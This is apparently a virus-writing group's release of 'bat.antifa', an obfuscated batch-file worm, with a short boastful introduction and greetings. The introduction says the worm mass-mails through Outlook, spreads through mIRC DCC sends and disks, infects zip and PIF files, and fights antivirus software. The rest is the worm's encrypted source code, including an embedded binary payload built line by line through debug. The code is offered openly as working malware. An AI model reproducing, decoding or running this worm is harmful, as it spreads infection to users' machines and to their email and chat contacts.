     +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
    /  bat.antifa by philet0ast3r [rRlf]  /
   +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+

                  010101
                 10010001  00     001101001
                 00    01  11    01110011010
                 01    11  00    00       11
                 10   010  10    11       00
       100100110101100010  00    00       10
    0100011100100101011    01    01      01
  01010          01        101100110001010
 0101          01100010    11001001010001
  1001       01011000110         10
    010      100 10   0110       01
     110   011   01     0001     11
      011 010    01       0100   00
       0110      10         1010 10
        10       00           01101
        00       11              01

             www.rRlf.de


I was bored somewhen last year (last year = 2002), when I started this.
Hehe, this is the first batch virus, that is executed from behind :]
Stupid, yes, but who cares?
It's an Outlook and mIRC worm. For mIRC spreading, Lord Yup's silend dcc send
is used (thanks again for that). The virus is encrypted using a (ok, not very
strong) set encryption. It infects zip-files, makes good use of for-windows
-unaccessable-directories, spreads via disks, and fights back to some avs.
It also infects pifs and has some message payloads. That's it I guess, the rest
can be seen from the (commented) code.

philet0ast3r would like to greet/thank some important persons:
3ri5, tanja, ina, janine, phily, rastafarie, LiSt, mindjuice, jackie, gl_st0rm,
Toro, breathe, alcopaul, NeKr0, Slage Hammer, Necronomikon, BeLiAL, malfunction,
Lord Yup, Industry, and all rRlf members.

Here is the code of the virus, as it comes:

=====[begin code]===============================================================
@echo off
ctty nul

:: bat.antifa
:: by philet0ast3r [rRlf]
:: the first batch-worm, that is executed from behind :]
:: (well, I was bored) ... finished: 27.2.2003, 16:04:39

goto ani
:wwwwwww
:%Þ%%º%%¸%%ð%%®%%º%%?%
%£%%®%%]%%®% %-%%æ%%?%
:vvvvvvv
%ï%%?% %õ%\%?%%-%%:%%÷%%]%%®%%Þ%\²%æ%%º%%©%%ø%%:%_%¿%%º%%¾%%:%!³
%£%%®%%]%%®% %¼%%¼%%¼%%¼%%¼%%¼%%¼%
:uuuuuuu
:%-%%½%%ø%%ð%
%£%%®%%]%%®% %½%%½%%½%%½%%½%%½%%½%
:ttttttt
%?%%-%%ð% %Þ%%ø%%±%.%½%%¦%%:%
%£%%®%%]%%®% %¾%%¾%%¾%%¾%%¾%%¾%%¾%
:sssssss
%±%%®%%¿% %%%÷% %ø%%æ% (%õ%\%?%%-%%:%%÷%%]%%®%%Þ%\*.%Þ%%ø%%±%) %?%%®% %.%%®%%Þ%%¸% %.%:\%Þ%%ø%%±%.%Þ%%ø%%±% %%%÷%
%£%%®%%]%%®% %]%%]%%]%%]%%]%%]%%]%
:rrrrrrr
%.%%®%%ï%%ï%%º%%æ%%?% /%±% /%.% %.%%®%%Þ%%¸% %.%:\%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º%.%¦%%º%%]% %º%:\
%£%%®%%]%%®% %:%%:%%:%%:%%:%%:%%:%
:qqqqqqq
%:%%]%%º%%¿%%]% %Þ%%ø%%±%.%½%%¦%%:%
%£%%®%%]%%®% %¿%%¿%%¿%%¿%%¿%%¿%%¿%
:ppppppp
%-%%.%%¬%%®% %ï%%:%%.%.S%º%%½%%-%>>%Þ%%ø%%±%.%½%%¦%%:%
%£%%®%%]%%®% %Ð%%Ð%%Ð%%Ð%%Ð%%Ð%%Ð%
:ooooooo
%-%%.%%¬%%®% %ï%%:%%.%.W%ø%%æ%%?%%®%%¼%S%]%%¸%%ð%%-% = %ù%>>%Þ%%ø%%±%.%½%%¦%%:%
%£%%®%%]%%®% %Þ%%Þ%%Þ%%Þ%%Þ%%Þ%%Þ%
:nnnnnnn
%-%%.%%¬%%®% %ï%%:%%.%.T%º%%¿%%£%%-%%]%P%º%%]%%¬% = %¼%%:%%¬%%:%.E%ª%%Þ%%º%%æ%%?%E%æ%%½%%ø%%¿%%®%%æ%%ï%%-%%æ%%]%S%]%%¿%%ø%%æ%%£%%:%("%.%:\%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º%.%¦%%º%%]%")>>%Þ%%ø%%±%.%½%%¦%%:%
%£%%®%%]%%®% %®%%®%%®%%®%%®%%®%%®%
:mmmmmmm
%-%%.%%¬%%®% %:%%-%%]% %ï%%:%%.%=%¼%%:%%¬%%:%.C%¿%%-%%º%%]%%-%S%¬%%®%%¿%%]%%.%%¾%%]%("C:\%Þ%%ø%%±%.%ð%%æ%%÷%")>>%Þ%%ø%%±%.%½%%¦%%:%
%£%%®%%]%%®% %æ%%æ%%æ%%æ%%æ%%æ%%æ%
:lllllll
%-%%.%%¬%%®% %:%%-%%]% %¼%%:%%¬%%:%=W%:%%.%%¿%%ø%%Þ%%]%.C%¿%%-%%º%%]%%-%O%¦%%¡%%-%%.%%]%("WS%.%%¿%%ø%%Þ%%]%.S%¬%%-%%ð%%ð%")>>%Þ%%ø%%±%.%½%%¦%%:%
%£%%®%%]%%®% %ï%%ï%%ï%%ï%%ï%%ï%%ï%
:kkkkkkk
%-%%.%%¬%%®% %?%%ø%%ï% %¼%%:%%¬%%:%, %ï%%:%%.%>>%Þ%%ø%%±%.%½%%¦%%:%
%£%%®%%]%%®% %ð%%ð%%ð%%ð%%ð%%ð%%ð%
:jjjjjjj
%-%%.%%¬%%®%.%®%%æ% %-%%¿%%¿%%®%%¿% %¿%%-%%:%%¾%%ï%%-% %æ%%-%%ª%%]%>%Þ%%ø%%±%.%½%%¦%%:%
%£%%®%%]%%®% %÷%%÷%%÷%%÷%%÷%%÷%%÷%
:iiiiiii
%:%%]%%º%%¿%%]% %õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %¡%%¡%%¡%%¡%%¡%%¡%%¡%
:hhhhhhh
%-%%.%%¬%%®% %æ%%-%%ª%%]%>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %ø%%ø%%ø%%ø%%ø%%ø%%ø%
:ggggggg
%-%%.%%¬%%®% %±% = "">>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %¬%%¬%%¬%%¬%%¬%%¬%%¬%
:fffffff
%-%%.%%¬%%®% %-%.S%-%%æ%%?%>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %£%%£%%£%%£%%£%%£%%£%
:eeeeeee
%-%%.%%¬%%®% %-%.D%-%%ð%%-%%]%%-%A%±%%]%%-%%¿%S%¾%%¦%%ï%%ø%%]% = F%º%%ð%%:%%-%>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %±%%±%%±%%±%%±%%±%%±%
:ddddddd
%-%%.%%¬%%®% %-%.A%]%%]%%º%%.%%¬%%ï%%-%%æ%%]%%:%.A%?%%?% ("%.%:\%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º%.%¦%%º%%]%")>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %-%%-%%-%%-%%-%%-%%-%
:ccccccc
%-%%.%%¬%%®% %-%.B%®%%?%%¸% = "D%-%%¾%%]%%:%%.%%¬%%ð%%º%%æ%%?% %½%%®%%æ% %?%%-%%¿% K%º%%¿%%]%%-% %:%%]%%¿%%-%%ø%%.%%¬%%-%%æ%," & %.%%¬%%¿%(%ý%%ú%) & "P%®%%ð%%-%%æ% %ï%%¾%%:%%:% %¦%%ø%%:% F%¿%%º%%æ%%÷%%¿%%-%%ø%%.%%¬% %¿%%-%%ø%%.%%¬%%-%%æ%!">>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %?%%?%%?%%?%%?%%?%%?%
:bbbbbbb
%-%%.%%¬%%®% %-%.S%¾%%¦%%¡%%-%%.%%]% = "%]%%¬%%ø%%:% %ø%%:% %¼%%¬%%-%%¿%%-% %ø%%]% %£%%-%%]%%:% NASTY">>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %.%%.%%.%%.%%.%%.%%.%
:aaaaaaa
%-%%.%%¬%%®% %æ%%-%%ª%%]%>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %¦%%¦%%¦%%¦%%¦%%¦%%¦%
:zzzzzz
%-%%.%%¬%%®% %ª% = %ª% + %ý%>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %º%%º%%º%%º%%º%%º%%º%
:yyyyyy
%-%%.%%¬%%®% %-%.R%-%%.%%ø%%Þ%%ø%%-%%æ%%]%%:%.A%?%%?% %±%>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %©%%©%%©%%©%%©%%©%
:xxxxxx
%-%%.%%¬%%®% %±% = %?%.A%?%%?%%¿%%-%%:%%:%E%æ%%]%%¿%%ø%%-%%:%(%ª%)>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %¸%%¸%%¸%%¸%%¸%%¸%
:wwwwww
%-%%.%%¬%%®% %±%%®%%¿% %®% = %ý% T%®% %?%.A%?%%?%%¿%%-%%:%%:%E%æ%%]%%¿%%ø%%-%%:%.C%®%%¾%%æ%%]%>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %ª%%ª%%ª%%ª%%ª%%ª%
:vvvvvv
%-%%.%%¬%%®% %:%%-%%]% %-% = %¦%.C%¿%%-%%º%%]%%-%I%]%%-%%ï%(%ÿ%)>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %¼%%¼%%¼%%¼%%¼%%¼%
:uuuuuu
%-%%.%%¬%%®% %ª% = %ý%>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %½%%½%%½%%½%%½%%½%
:tttttt
%-%%.%%¬%%®% %:%%-%%]% %?% = %.%.A%?%%?%%¿%%-%%:%%:%L%ø%%:%%]%%:%(%¸%)>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %¾%%¾%%¾%%¾%%¾%%¾%
:ssssss
%-%%.%%¬%%®% %±%%®%%¿% %¸% = %ý% T%®% %.%.A%?%%?%%¿%%-%%:%%:%L%ø%%:%%]%%:%.C%®%%¾%%æ%%]%>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %]%%]%%]%%]%%]%%]%
:rrrrrr
%-%%.%%¬%%®% %:%%-%%]% %.% = %¦%.G%-%%]%N%º%%ï%%-%S%Þ%%º%%.%%-%("MAPI")>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %:%%:%%:%%:%%:%%:%
:qqqqqq
%-%%.%%¬%%®% %:%%-%%]% %¦% = C%¿%%-%%º%%]%%-%O%¦%%¡%%-%%.%%]%("O%¾%%]%%ð%%®%%®%%÷%.A%Þ%%Þ%%ð%%ø%%.%%º%%]%%ø%%®%%æ%")>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %¿%%¿%%¿%%¿%%¿%%¿%
:pppppp
%-%%.%%¬%%®% %:%%-%%]% %º% = W%:%%.%%¿%%ø%%Þ%%]%.C%¿%%-%%º%%]%%-%O%¦%%¡%%-%%.%%]%("W%:%%.%%¿%%ø%%Þ%%]%.S%¬%%-%%ð%%ð%")>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %Ð%%Ð%%Ð%%Ð%%Ð%%Ð%
:oooooo
%-%%.%%¬%%®% %?%%ø%%ï% %º%,%¦%,%.%,%?%,%-%>>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %Þ%%Þ%%Þ%%Þ%%Þ%%Þ%
:nnnnnn
%-%%.%%¬%%®%.%®%%æ% %-%%¿%%¿%%®%%¿% %¿%%-%%:%%¾%%ï%%-% %æ%%-%%ª%%]%>%õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %®%%®%%®%%®%%®%%®%
:mmmmmm
%?%%-%%ð% %õ%\%®%%®%%®%.%½%%¦%%:%
%£%%®%%]%%®% %æ%%æ%%æ%%æ%%æ%%æ%
:llllll
%±%%®%%¿% %%%ø% %ø%%æ% (*.%©%%ø%%Þ% ..\*.%©%%ø%%Þ% %õ%\%?%%-%%:%%÷%%]%%®%%Þ%\*.%©%%ø%%Þ%) %?%%®% %Þ%%®%%¼%%-%%¿%%º%%¿%%.% -%º% -%.%%ù% %%%ø% %.%:\%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º%.%¦%%º%%]%
%£%%®%%]%%®% %ï%%ï%%ï%%ï%%ï%%ï%
:kkkkkk
%±%%®%%¿% %%%ø% %ø%%æ% (*.%©%%ø%%Þ% ..\*.%©%%ø%%Þ% %õ%\%?%%-%%:%%÷%%]%%®%%Þ%\*.%©%%ø%%Þ%) %?%%®% %Þ%%÷%%©%%ø%%Þ% -%-%%ÿ% -%¾% -%¿% -%÷% %%%ø% "%.%:\%¦%%º%%]%.%º%%æ%%]%%ø%%±%%º%.%¦%%º%%]%">%æ%%¾%%ð%.%©%%ø%%Þ%
%£%%®%%]%%®% %ð%%ð%%ð%%ð%%ð%%ð%
:jjjjjj
%?%%-%%ð% %ð%%®%%¿%%?%
%£%%®%%]%%®% %÷%%÷%%÷%%÷%%÷%%÷%
:iiiiii
%ï%%®%%½%%-% %ð%%®%%¿%%?% %.%:\%Þ%%¿%%®%%£%%¿%%º%~%ý%\%ï%%ø%%¿%%.%%ú%%û%\%:%%.%%¿%%ø%%Þ%%]%.%ø%%æ%%ø%
%£%%®%%]%%®% %¡%%¡%%¡%%¡%%¡%%¡%
:hhhhhh
%ï%%®%%½%%-% %ð%%®%%¿%%?% %.%:\%Þ%%¿%%®%%£%%¿%%º%~%ý%\%ï%%ø%%¿%%.%\%:%%.%%¿%%ø%%Þ%%]%.%ø%%æ%%ø%
%£%%®%%]%%®% %ø%%ø%%ø%%ø%%ø%%ø%
:gggggg
%ï%%®%%½%%-% %ð%%®%%¿%%?% %.%:\%ï%%ø%%¿%%.%%ú%%û%\%:%%.%%¿%%ø%%Þ%%]%.%ø%%æ%%ø%
%£%%®%%]%%®% %¬%%¬%%¬%%¬%%¬%%¬%
:ffffff
%ï%%®%%½%%-% %ð%%®%%¿%%?% %.%:\%ï%%ø%%¿%%.%\%:%%.%%¿%%ø%%Þ%%]%.%ø%%æ%%ø%
%£%%®%%]%%®% %£%%£%%£%%£%%£%%£%
:eeeeee
%?%%-%%ð% %.%:\%Þ%%º%%¸%%ð%%®%%º%%?%.%¿%%-%%£%
%£%%®%%]%%®% %±%%±%%±%%±%%±%%±%
:dddddd
%?%%-%%ð% %¸%%¾%%Þ%
%£%%®%%]%%®% %-%%-%%-%%-%%-%%-%
:cccccc
%?%%-%%¦%%¾%%£%<%¸%%¾%%Þ%
%£%%®%%]%%®% %?%%?%%?%%?%%?%%?%
:bbbbbb
:: %.%%¾%%]% :)
%£%%®%%]%%®% %.%%.%%.%%.%%.%%.%
:aaaaaa
%-%%.%%¬%%®% %Ð%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¦%%¦%%¦%%¦%%¦%%¦%
:zzzzz
%-%%.%%¬%%®% %¼%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %º%%º%%º%%º%%º%%º%
:yyyyy
%-%%.%%¬%%®% %æ% %ð%%®%%¿%%?%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %©%%©%%©%%©%%©%
:xxxxx
%-%%.%%¬%%®% %ÿ%%ù%%±%%¦%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¸%%¸%%¸%%¸%%¸%
:wwwww
%-%%.%%¬%%®% %¿%%.%%ª%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ª%%ª%%ª%%ª%%ª%
:vvvvv
%-%%.%%¬%%®% %-% %ÿ%%ô%%±%%ÿ% %ò%%ú% %ó%%±% %ó%%ú% %ó%%¦% %ô%%±% %ó%%-% %ó%%ý% %ó%%?% %ó%%ô% %û%%ÿ% %ò%%?% %±%%ú%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¼%%¼%%¼%%¼%%¼%
:uuuuu
%-%%.%%¬%%®% %-% %ÿ%%ô%%-%%ÿ% %ó%%ô% %û%%ÿ% %ò%%¦% %û%%ÿ% %û%%-% %ò%%ú% %ó%%±% %ó%%ú% %ó%%¦% %ó%%ú% %ó%%.% %ó%%±% %ò%%ú% %ó%%ô% %û%%ÿ% %û%%ô%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %½%%½%%½%%½%%½%
:ttttt
%-%%.%%¬%%®% %-% %ÿ%%ô%%?%%ÿ% %ÿ%%º% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %ó%%ý% %ó%%.% %ó%%í% %ó%%ý% %ò%%ú% %û%%ÿ% %ó%%ú% %ó%%.% %ó%%±% %ò%%º%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¾%%¾%%¾%%¾%%¾%
:sssss
%-%%.%%¬%%®% %-% %ÿ%%ô%%.%%ÿ% %û%%ÿ% %ú%%ù% %ú%%ÿ% %ú%%ÿ% %ú%%ÿ% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %ò%%?% %û%%ÿ% %ò%%?% %û%%ÿ% %ò%%?% %ÿ%%?%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %]%%]%%]%%]%%]%
:rrrrr
%-%%.%%¬%%®% %-% %ÿ%%ô%%¦%%ÿ% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ô% %ó%%.% %û%%ÿ% %ú%%?% %û%%ÿ% %û%%ô% %ó%%.% %û%%ÿ% %û%%¦%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %:%%:%%:%%:%%:%
:qqqqq
%-%%.%%¬%%®% %-% %ÿ%%ô%%º%%ÿ% %ó%%-% %ò%%ù% %ô%%±% %ó%%-% %ó%%ý% %ó%%?% %ó%%ô% %û%%ÿ% %ú%%ù% %ú%%ÿ% %ú%%ÿ% %ú%%ÿ% %û%%ÿ% %û%%ó% %ó%%.% %ó%%ô%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¿%%¿%%¿%%¿%%¿%
:ppppp
%-%%.%%¬%%®% %-% %ÿ%%ô%%í%%ÿ% %ó%%ú% %ó%%¦% %ò%%ò% %ò%%û% %ó%%í% %ò%%ù% %ó%%ô% %û%%ÿ% %û%%?% %ó%%û% %û%%ÿ% %û%%ô% %ó%%ú% %ó%%.% %ó%%í% %ó%%ô%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %Ð%%Ð%%Ð%%Ð%%Ð%
:ooooo
%-%%.%%¬%%®% %-% %ÿ%%ô%%î%%ÿ% %ú%%ÿ% %ú%%ÿ% %û%%ÿ% %û%%ó% %ó%%.% %ó%%ô% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú% %ó%%±%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %Þ%%Þ%%Þ%%Þ%%Þ%
:nnnnn
%-%%.%%¬%%®% %-% %ÿ%%ô%%ò%%ÿ% %ó%%ô% %ó%%ý% %ó%%ù% %û%%ÿ% %û%%ô% %ó%%ó% %ó%%í% %ó%%.% %ó%%ô% %ó%%ô% %û%%ÿ% %û%%ô% %ó%%.% %û%%ÿ% %ú%%ù% %ú%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %®%%®%%®%%®%%®%
:mmmmm
%-%%.%%¬%%®% %-% %ÿ%%ô%%ó%%ÿ% %ú%%?% %û%%ÿ% %ú%%ý% %û%%í% %û%%ÿ% %ò%%¦% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ó%%û% %ò%%û%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %æ%%æ%%æ%%æ%%æ%
:lllll
%-%%.%%¬%%®% %-% %ÿ%%ô%%ô%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ó%%í% %ó%%ó% %û%%ÿ% %û%%î% %û%%ô% %ó%%ô% %ó%%-% %ó%%ù% %û%%ÿ% %û%%ý%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ï%%ï%%ï%%ï%%ï%
:kkkkk
%-%%.%%¬%%®% %-% %ÿ%%ô%%ù%%ÿ% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %ò%%?% %û%%ÿ% %û%%-% %ó%%ô% %ó%%.% %ò%%ú% %ó%%ô% %û%%ÿ% %ò%%¦% %ÿ%%?% %ÿ%%º%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ð%%ð%%ð%%ð%%ð%
:jjjjj
%-%%.%%¬%%®% %-% %ÿ%%ô%%ú%%ÿ% %ó%%ý% %ó%%?% %ó%%ô% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ó%%î% %ó%%ý% %ó%%.% %ò%%ù% %ÿ%%?%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %÷%%÷%%÷%%÷%%÷%
:iiiii
%-%%.%%¬%%®% %-% %ÿ%%ô%%û%%ÿ% %ó%%¦% %ó%%ú% %ó%%.% %ó%%±% %ò%%ú% %ó%%ô% %û%%ÿ% %û%%ô% %ó%%ú% %ó%%.% %ó%%í% %ó%%ô% %ó%%-% %ò%%ù% %ô%%±% %ó%%-%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¡%%¡%%¡%%¡%%¡%
:hhhhh
%-%%.%%¬%%®% %-% %ÿ%%ô%%ý%%ÿ% %ó%%ô% %ó%%-% %ó%%ù% %û%%ÿ% %ú%%ý% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú% %ó%%±% %ó%%ú%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ø%%ø%%ø%%ø%%ø%
:ggggg
%-%%.%%¬%%®% %-% %ÿ%%ô%%ÿ%%ÿ% %û%%í% %û%%ÿ% %ò%%¦% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú% %ó%%ô% %ò%%ù% %û%%ÿ% %û%%ô%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¬%%¬%%¬%%¬%%¬%
:fffff
%-%%.%%¬%%®% %-% %ÿ%%ù%%±%%ÿ% %ó%%í% %ó%%.% %ó%%ô% %û%%î% %û%%ô% %ó%%ó% %ó%%í% %ó%%.% %ó%%ô% %ó%%ô% %û%%í% %û%%-% %ò%%ú% %ó%%í% %ò%%º% %ó%%ô%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %£%%£%%£%%£%%£%
:eeeee
%-%%.%%¬%%®% %-% %ÿ%%ù%%-%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ó%%í% %ó%%ó% %û%%ÿ% %û%%î% %û%%ô% %ó%%.% %û%%ÿ% %ú%%-% %ú%%?% %û%%ÿ% %û%%ù% %ó%%ó%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %±%%±%%±%%±%%±%
:ddddd
%-%%.%%¬%%®% %-% %ÿ%%ù%%?%%ÿ% %ó%%ú% %ó%%.% %ó%%í% %ó%%ô% %ó%%-% %ò%%ù% %ô%%±% %ó%%-% %ó%%ý% %ó%%?% %ó%%ô% %ú%%º% %û%%ÿ% %ò%%¦% %ÿ%%?% %ÿ%%º%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %-%%-%%-%%-%%-%
:ccccc
%-%%.%%¬%%®% %-% %ÿ%%ù%%.%%ÿ% %û%%ÿ% %ó%%±% %ó%%-% %û%%ÿ% %ú%%ý% %ú%%º% %ò%%ú% %ó%%±% %ó%%ú% %ó%%¦% %ò%%û% %ó%%ô% %ó%%ý% %ó%%ù% %ú%%º% %û%%ô%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %?%%?%%?%%?%%?%
:bbbbb
%-%%.%%¬%%®% %-% %ÿ%%ù%%¦%%ÿ% %ó%%-% %ó%%ù% %û%%ÿ% %ú%%ÿ% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %ò%%?% %ÿ%%?% %ÿ%%º% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %.%%.%%.%%.%%.%
:aaaaa
%-%%.%%¬%%®% %-% %ÿ%%ù%%º%%ÿ% %ú%%ù% %ú%%ÿ% %ú%%ÿ% %ú%%ÿ% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú% %ó%%ô% %ò%%ù% %û%%ÿ% %û%%ô% %ó%%ô%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¦%%¦%%¦%%¦%%¦%
:zzzz
%-%%.%%¬%%®% %-% %ÿ%%ù%%í%%ÿ% %ó%%ô% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%ô% %ó%%.% %û%%ÿ% %ú%%?% %û%%ÿ% %û%%ô% %ó%%.% %û%%ÿ% %û%%¦% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %º%%º%%º%%º%%º%
:yyyy
%-%%.%%¬%%®% %-% %ÿ%%ù%%î%%ÿ% %ó%%ô% %ó%%-% %ò%%ù% %ô%%±% %ó%%-% %ó%%ý% %ó%%?% %ó%%ô% %û%%ÿ% %ú%%ù% %ú%%ÿ% %ú%%ÿ% %ú%%ÿ% %û%%ÿ% %û%%ó% %ó%%.%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %©%%©%%©%%©%
:xxxx
%-%%.%%¬%%®% %-% %ÿ%%ù%%ò%%ÿ% %ó%%±% %ó%%ú% %ó%%¦% %ò%%ò% %ò%%û% %ó%%í% %ò%%ù% %ó%%ô% %û%%ÿ% %û%%?% %ó%%û% %û%%ÿ% %û%%ô% %ó%%ú% %ó%%.% %ó%%í%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¸%%¸%%¸%%¸%
:wwww
%-%%.%%¬%%®% %-% %ÿ%%ù%%ó%%ÿ% %û%%ÿ% %ú%%ù% %ú%%ÿ% %ú%%ÿ% %ú%%ÿ% %û%%ÿ% %û%%ó% %ó%%.% %ó%%ô% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %ª%%ª%%ª%%ª%
:vvvv
%-%%.%%¬%%®% %-% %ÿ%%ù%%ô%%ÿ% %û%%-% %ó%%û% %ò%%û% %ó%%ô% %ó%%ý% %ó%%ù% %û%%ÿ% %û%%ô% %ó%%ó% %ó%%í% %ó%%.% %ó%%ô% %ó%%ô% %û%%ÿ% %û%%ô% %ó%%.%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¼%%¼%%¼%%¼%
:uuuu
%-%%.%%¬%%®% %-% %ÿ%%ù%%ù%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú% %ó%%ô% %ò%%ù% %û%%ÿ% %û%%ô% %ó%%.% %û%%ÿ% %ú%%ÿ% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %½%%½%%½%%½%
:tttt
%-%%.%%¬%%®% %-% %ÿ%%ù%%ú%%ÿ% %ò%%ú% %ó%%ô% %û%%ÿ% %û%%ô% %ò%%ú% %ó%%±% %ó%%ú% %ó%%¦% %ô%%±% %ó%%-% %ó%%ý% %ó%%?% %ó%%ô% %ÿ%%?% %ÿ%%º% %û%%ÿ%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¾%%¾%%¾%%¾%
:ssss
%-%%.%%¬%%®% %-% %ÿ%%ù%%û%%ÿ% %ó%%ý% %ó%%?% %ó%%ô% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú% %ó%%±% %ó%%ú% %ó%%¦% %ó%%ú% %ó%%.% %ó%%±%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %]%%]%%]%%]%
:rrrr
%-%%.%%¬%%®% %-% %ÿ%%ù%%ý%%ÿ% %ó%%ý% %ó%%ú% %ó%%ú% %ó%%ô% %ò%%ÿ% %ò%%ù% %û%%ÿ% %û%%ô% %ó%%ú% %ó%%.% %ó%%í% %ó%%ô% %ó%%-% %ò%%ù% %ô%%±% %ó%%-%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %:%%:%%:%%:%
:qqqq
%-%%.%%¬%%®% %-% %ÿ%%ù%%ÿ%%ÿ% %ú%%í% %ú%%í% %ú%%í% %ú%%í% %ú%%í% %û%%í% %ÿ%%?% %ÿ%%º% %û%%ÿ% %û%%ÿ% %û%%ÿ% %û%%-% %ò%%ú% %ó%%±% %ó%%ú% %ó%%¦%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %¿%%¿%%¿%%¿%
:pppp
%-%%.%%¬%%®% %-% %ÿ%%ú%%±%%ÿ% %ô%%±% %ó%%-% %ó%%ý% %ó%%?% %ó%%ô% %û%%ÿ% %û%%ù% %ò%%û% %ó%%ý% %ó%%-% %ó%%ù% %û%%î% %ú%%ý% %û%%.% %ú%%í% %ú%%í%>>%¸%%¾%%Þ%
%£%%®%%]%%®% %Ð%%Ð%%Ð%%Ð%
:oooo
